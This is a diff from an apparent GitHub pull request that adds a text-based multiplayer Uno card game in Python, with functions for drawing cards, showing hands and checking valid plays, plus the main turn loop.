+"""Draw card function that draws a specified number of cards off the top of the deck
+Parameters: numCards -> integer
+Return: cardsDrawn -> list
+"""
+
+
+def drawCards(numCards):
+ cardsDrawn = []
+ for x in range(numCards):
+ cardsDrawn.append(unoDeck.pop(0))
+ return cardsDrawn
+
+
+"""
+Print formatted list of player's hand
+Parameter: player->integer , playerHand->list
+Return: None
+"""
+
+
+def showHand(player, playerHand):
+ print("Player {}'s Turn".format(players_name[player]))
+ print("Your Hand")
+ print("------------------")
+ y = 1
+ for card in playerHand:
+ print("{}) {}".format(y, card))
+ y += 1
+ print("")
+
+
+"""
+Check whether a player is able to play a card, or not
+Parameters: discardCard->string,value->string, playerHand->list
+Return: boolean
+"""
+
+
+def canPlay(colour, value, playerHand):
+ for card in playerHand:
+ if "Wild" in card:
+ return True
+ elif colour in card or value in card:
+ return True
+ return False
+
+
+unoDeck = buildDeck()
+unoDeck = shuffleDeck(unoDeck)
+unoDeck = shuffleDeck(unoDeck)
+discards = []
+
+players_name = []
+players = []
+colours = ["Red", "Green", "Yellow", "Blue"]
+numPlayers = int(input("How many players?"))
+while numPlayers < 2 or numPlayers > 4:
+ numPlayers = int(
+ input("Invalid. Please enter a number between 2-4.\nHow many players?"))
+for player in range(numPlayers):
+ players_name.append(input("Enter player {} name: ".format(player+1)))
+ players.append(drawCards(5))
+
+
+playerTurn = 0
+playDirection = 1
+playing = True
+discards.append(unoDeck.pop(0))
+splitCard = discards[0].split(" ", 1)
+currentColour = splitCard[0]
+if currentColour != "Wild":
+ cardVal = splitCard[1]
+else:
+ cardVal = "Any"
+
+while playing:
+ showHand(playerTurn, players[playerTurn])
+ print("Card on top of discard pile: {}".format(discards[-1]))
+ if canPlay(currentColour, cardVal, players[playerTurn]):
+ cardChosen = int(input("Which card do you want to play?"))
+ while not canPlay(currentColour, cardVal, [players[playerTurn][cardChosen-1]]):
+ cardChosen = int(
+ input("Not a valid card. Which card do you want to play?"))
+ print("You played {}".format(players[playerTurn][cardChosen-1]))
+ discards.append(players[playerTurn].pop(cardChosen-1))
+
+ # cheak if player won
+ if len(players[playerTurn]) == 0:
+ playing = False
+ # winner = "Player {}".format(playerTurn+1)
+ winner = players_name[playerTurn]
+ else:
+ # cheak for special cards
+ splitCard = discards[-1].split(" ", 1)
+ currentColour = splitCard[0]
+ if len(splitCard) == 1:
+ cardVal = "Any"
+ else:
+ cardVal = splitCard[1]
+ if currentColour == "Wild":
+ for x in range(len(colours)):
+ print("{}) {}".format(x+1, colours[x]))
+ newColour = int(
+ input("What colour would you like to choose? "))
+ while newColour < 1 or newColour > 4:
+ newColour = int(
+ input("Invalid option. What colour would you like to choose"))
+ currentColour = colours[newColour-1]
+ if cardVal == "Reverse":
+ playDirection = playDirection * -1
+ elif cardVal == "Skip":
+ playerTurn += playDirection
+ if playerTurn >= numPlayers:
+ playerTurn = 0
+ elif playerTurn < 0:
+ playerTurn = numPlayers-1
+ elif cardVal == "Draw Two":
+ playerDraw = playerTurn+playDirection
+ if playerDraw == numPlayers:
+ playerDraw = 0
+ elif playerDraw < 0:
+ playerDraw = numPlayers-1
+ players[playerDraw].extend(drawCards(2))
+ elif cardVal == "Draw Four":
+ playerDraw = playerTurn+playDirection
+ if playerDraw == numPlayers:
+ playerDraw = 0
+ elif playerDraw < 0:
+ playerDraw = numPlayers-1
+ players[playerDraw].extend(drawCards(4))
+ print("")
+ else:
+ print("You can't play. You have to draw a card.")
+ players[playerTurn].extend(drawCards(1))
+
+ playerTurn += playDirection
+ if playerTurn >= numPlayers:
+ playerTurn = 0
+ elif playerTurn < 0:
+ playerTurn = numPlayers-1
+
+print("Game Over")
+print("{} is the Winner!".format(winner))
| snake ladder and uno both multiplayer games implemented in python | https://api.github.com/repos/geekcomputers/Python/pulls/1513 | 2022-05-14T12:24:54Z | 2022-05-14T15:15:37Z | 2022-05-14T15:15:37Z | 2022-05-14T15:15:37Z | 2,818 | geekcomputers/Python | 31,708 |